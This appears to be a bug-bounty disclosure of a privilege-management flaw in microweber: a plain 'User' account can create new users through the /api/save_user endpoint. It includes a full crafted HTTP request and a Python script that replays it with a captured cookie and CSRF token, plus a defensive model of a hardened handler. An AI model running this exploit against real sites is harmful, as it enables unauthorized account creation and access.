Improper Privilege Management in microweber/microweber
Valid
Reported on
Sep 9th 2021
✍️ Description
A user holding only the plain "User" role (no Super Admin privileges) is able to add further users to the system through the admin user-management API.
🕵️♂️ Proof of Concept (Burp Suite or another intercepting proxy is required)
1. Create a user with the plain "User" role (USER A).
2. Log in as USER A.
3. Obtain the X-Csrf-Token and the Cookie value of USER A.
4. Send the following request with the placeholders filled in, inserting the obtained X-Csrf-Token and Cookie value:
POST /api/save_user HTTP/1.1
Host: <INSERT_HOSTNAME_HERE>
Content-Length: 226
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://<INSERT_HOSTNAME_HERE>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<INSERT_HOSTNAME_HERE>/admin/view:modules/load_module:users/edit-user:0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Cookie: <INSERT_COOKIE_HERE>
thumbnail=&id=0&token=<INSERT_X-Csrf-Token_HERE>&username=<INSERT_NEW_USERNAME_HERE>&password=<INSERT_NEW_PASSWORD_HERE>&verify_password=<INSERT_NEW_PASSWORD_HERE>&first_name=unauthorized&last_name=user&email=<INSERT_EMAIL_HERE>&phone=&roles%5B%5D=User&is_active=1&basic_mode=0&api_key=
After the request is sent, the new user is created, and the attacker can log in with the newly created account.
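The replay of steps 3 and 4 as a small Python harness. This is an added example, not code from the huntr report or from the microweber project: it assumes the operator has already captured USER A's Cookie header value and X-Csrf-Token with a proxy, that the endpoint path and form fields are exactly those of the captured request above, and that the status-code reading in classify() (a generic HTTP/Laravel heuristic) is a starting point to be confirmed by logging in as the new user.

```python
"""Reproduction harness for the /api/save_user privilege escalation described
in the proof of concept above.  Added example, not code from the huntr report
or from microweber.

Assumptions: the target is reachable at BASE_URL; USER A's Cookie header value
and X-Csrf-Token were captured with an intercepting proxy (steps 1-3); the
endpoint path and form fields are those of the captured request.  The verdict
in classify() is a generic HTTP/Laravel heuristic, not a microweber contract.
"""
import sys
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

ENDPOINT = "/api/save_user"


def build_payload(token, username, password, email, role="User"):
    """Form fields exactly as in the captured request.  roles[] is a list so
    that urlencode(..., doseq=True) emits roles%5B%5D=User like the browser."""
    return {
        "thumbnail": "",
        "id": "0",  # id=0 asks the endpoint to create a user rather than edit one
        "token": token,  # the CSRF token travels in the body as well as the header
        "username": username,
        "password": password,
        "verify_password": password,
        "first_name": "unauthorized",
        "last_name": "user",
        "email": email,
        "phone": "",
        "roles[]": [role],
        "is_active": "1",
        "basic_mode": "0",
        "api_key": "",
    }


def encode_form(payload):
    """application/x-www-form-urlencoded body; list values are repeated per element."""
    return urlencode(payload, doseq=True)


def classify(status_code):
    """Heuristic verdict from the HTTP status (assumed generic semantics)."""
    if 200 <= status_code < 300:
        return "accepted: confirm by logging in as the new user"
    if status_code in (401, 403):
        return "rejected: server enforced authorization (likely patched)"
    if status_code == 419:
        return "csrf mismatch: recapture the token and cookie"
    if status_code == 422:
        return "validation error: change username, email or password"
    return "unexpected status %d" % status_code


def attempt(base_url, cookie, token, username, password, email):
    """Replay the captured request under USER A's session; returns (status, body)."""
    headers = {
        "Cookie": cookie,
        "X-Csrf-Token": token,
        "X-Requested-With": "XMLHttpRequest",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Origin": base_url,
        "Referer": base_url + "/admin/view:modules/load_module:users/edit-user:0",
    }
    body = encode_form(build_payload(token, username, password, email)).encode()
    req = Request(base_url + ENDPOINT, data=body, headers=headers, method="POST")
    try:
        with urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:  # non-2xx responses are raised by urlopen
        return err.code, err.read().decode("utf-8", "replace")


if __name__ == "__main__":
    if len(sys.argv) != 7:
        sys.exit("usage: poc.py BASE_URL COOKIE CSRF_TOKEN NEW_USER NEW_PASSWORD NEW_EMAIL")
    status, text = attempt(*sys.argv[1:])
    print(status, classify(status))
    print(text[:500])
```

Run it as `python3 poc.py https://target.example 'PHPSESSID=...' '<token>' evil 'Passw0rd!' evil@example.com`; a 2xx answer is only a hint, and the real confirmation is the login in the last step of the report.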
💥 Impact
The user-management function of the administrator interface is exposed to any authenticated user, so the access control that should restrict it to administrators can be bypassed.
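To make the missing control concrete, the following model contrasts a save_user handler that checks only authentication and CSRF (the behaviour the report describes) with one that also enforces authorization. This is an added example in plain Python, not microweber's PHP code: the Session, UserStore and handler names, the "Super Admin" role name and the sample sessions are constructed to model the report, and the second rule in the hardened version (a caller may not grant roles it does not hold) goes slightly beyond the report, which only shows a "User" role being created.

```python
"""Model of the broken check behind this report next to a hardened one.
Added example, not microweber code; all names here are hypothetical."""
from dataclasses import dataclass, field

ADMIN_ROLES = {"Super Admin"}  # assumed name of the privileged role


@dataclass
class Session:
    user_id: int
    roles: set
    csrf_token: str


@dataclass
class UserStore:
    users: dict = field(default_factory=dict)
    next_id: int = 2  # id 1 is the pre-existing administrator (constructed)

    def create(self, username, roles):
        uid = self.next_id
        self.next_id += 1
        self.users[uid] = {"username": username, "roles": set(roles)}
        return uid


def save_user_vulnerable(store, session, form):
    """Only authentication and CSRF are verified: any logged-in user may create users."""
    if session is None or form.get("token") != session.csrf_token:
        return 403, "forbidden"
    uid = store.create(form["username"], form.get("roles[]", []))
    return 200, {"id": uid}


def save_user_hardened(store, session, form):
    """Same endpoint with the authorization the report shows to be missing:
    1. the caller must hold an administrative role;
    2. the caller may not grant roles it does not hold itself, so a future bug
       cannot turn 'create a User' into 'create a Super Admin'."""
    if session is None or form.get("token") != session.csrf_token:
        return 403, "forbidden"
    if not session.roles & ADMIN_ROLES:
        return 403, "only administrators may manage users"
    requested = set(form.get("roles[]", []))
    # An admin may always hand out the basic User role, plus any role it holds.
    if not requested <= (session.roles | {"User"}):
        return 403, "cannot grant roles you do not hold"
    uid = store.create(form["username"], requested)
    return 200, {"id": uid}


# Constructed sample data mirroring the report: USER A holds only the User role.
USER_A = Session(user_id=7, roles={"User"}, csrf_token="tokA")
ADMIN = Session(user_id=1, roles={"Super Admin"}, csrf_token="tokAdmin")
FORM_FROM_REPORT = {"id": "0", "token": "tokA", "username": "evil", "roles[]": ["User"]}


def demo():
    """Status codes for the report's request under both handlers and both callers."""
    results = {}
    results["vuln_user_a"] = save_user_vulnerable(UserStore(), USER_A, FORM_FROM_REPORT)[0]
    results["hard_user_a"] = save_user_hardened(UserStore(), USER_A, FORM_FROM_REPORT)[0]
    admin_form = dict(FORM_FROM_REPORT, token="tokAdmin")
    results["hard_admin"] = save_user_hardened(UserStore(), ADMIN, admin_form)[0]
    return results


if __name__ == "__main__":
    print(demo())
```

The CSRF token alone proves only that the request came from USER A's own browser session; it says nothing about what USER A is allowed to do, which is why the vulnerable handler accepts the request.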
We have contacted a member of the microweber team and are waiting to hear back.